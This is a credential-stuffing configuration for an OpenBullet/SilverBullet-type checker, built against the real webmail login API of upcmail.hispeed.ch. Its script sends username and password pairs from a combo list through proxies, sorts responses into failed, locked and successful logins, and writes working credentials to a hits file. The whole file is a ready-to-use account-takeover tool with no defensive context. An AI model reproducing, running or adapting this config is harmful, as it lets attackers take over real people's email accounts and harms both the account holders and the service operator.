[SETTINGS]
{
  "Name": "hispeed.ch",
  "SuggestedBots": 100,
  "MaxCPM": 0,
  "LastModified": "2023-05-08T17:21:43.6758153+07:00",
  "AdditionalInfo": "",
  "RequiredPlugins": [],
  "Author": "@ntphong04",
  "Version": "1.1.2 [SB]",
  "SaveEmptyCaptures": false,
  "ContinueOnCustom": false,
  "SaveHitsToTextFile": true,
  "IgnoreResponseErrors": false,
  "MaxRedirects": 8,
  "NeedsProxies": true,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "BanProxyAfterGoodStatus": false,
  "BanLoopEvasionOverride": -1,
  "EncodeData": false,
  "AllowedWordlist1": "",
  "AllowedWordlist2": "",
  "DataRules": [],
  "CustomInputs": [],
  "CaptchaUrl": "",
  "IsBase64": false,
  "FilterList": [],
  "EvaluateMathOCR": false,
  "SecurityProtocol": 0,
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "QuitOnBanRetry": false,
  "AcceptInsecureCertificates": true,
  "DisableNotifications": false,
  "DisableImageLoading": false,
  "DefaultProfileDirectory": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": "",
  "Title": "hispeed",
  "IconPath": "Icon\\svbfile.ico",
  "LicenseSource": null,
  "Message": null,
  "MessageColor": "#FFFFFFFF",
  "HitInfoFormat": "[{hit.Type}][{hit.Proxy}] {hit.Data} - [{hit.CapturedString}]",
  "AuthorColor": "#FFFFB266",
  "WordlistColor": "#FFB5C2E1",
  "BotsColor": "#FFA8FFFF",
  "CustomInputColor": "#FFD6C7C7",
  "CPMColor": "#FFFFFFFF",
  "ProgressColor": "#FFAD93E3",
  "HitsColor": "#FF66FF66",
  "CustomColor": "#FFFFB266",
  "ToCheckColor": "#FF7FFFD4",
  "FailsColor": "#FFFF3333",
  "RetriesColor": "#FFFFFF99",
  "OcrRateColor": "#FF4698FD",
  "ProxiesColor": "#FFFFFFFF"
}

[SCRIPT]
REQUEST POST "https://upcmail.hispeed.ch/appsuite/api/login" 
  CONTENT "action=login&name=<USER>&password=<PASS>&locale=en_US&client=open-xchange-appsuite&version=7.10.6-15&timeout=10000&rampup=true&rampUpFor=open-xchange-appsuite&staySignedIn=true" 
  CONTENTTYPE "application/x-www-form-urlencoded" 
  HEADER "Accept: application/json, text/javascript, */*; q=0.01" 
  HEADER "Accept-Encoding: gzip, deflate, br" 
  HEADER "Accept-Language: vi,en;q=0.9,en-GB;q=0.8,en-US;q=0.7" 
  HEADER "Connection: keep-alive" 
  HEADER "Host: upcmail.hispeed.ch" 
  HEADER "Origin: https://upcmail.hispeed.ch" 
  HEADER "Referer: https://upcmail.hispeed.ch/appsuite/signin" 
  HEADER "sec-ch-ua: \"Microsoft Edge\";v=\"113\", \"Chromium\";v=\"113\", \"Not-A.Brand\";v=\"24\"" 
  HEADER "sec-ch-ua-mobile: ?0" 
  HEADER "sec-ch-ua-platform: \"Windows\"" 
  HEADER "Sec-Fetch-Dest: empty" 
  HEADER "Sec-Fetch-Mode: cors" 
  HEADER "Sec-Fetch-Site: same-origin" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.35" 
  HEADER "X-Requested-With: XMLHttpRequest" 

KEYCHECK 
  KEYCHAIN Failure OR 
    KEY "The user name or password is incorrect." 
    KEY "Account preliminarily deleted and in quarantine." 
    KEY "Locked due to SPAM/Abuse" 
    KEY "Account was deleted." 
    KEY "An error occurred inside the server which prevented it from fulfilling the request" 
    KEY "Login not possible at the moment. Please try again later." 
  KEYCHAIN Success OR 
    KEY "\"session\"" 

UTILITY File "Result//Hispeed.ch.txt" AppendLines "<USER>:<PASS>" 

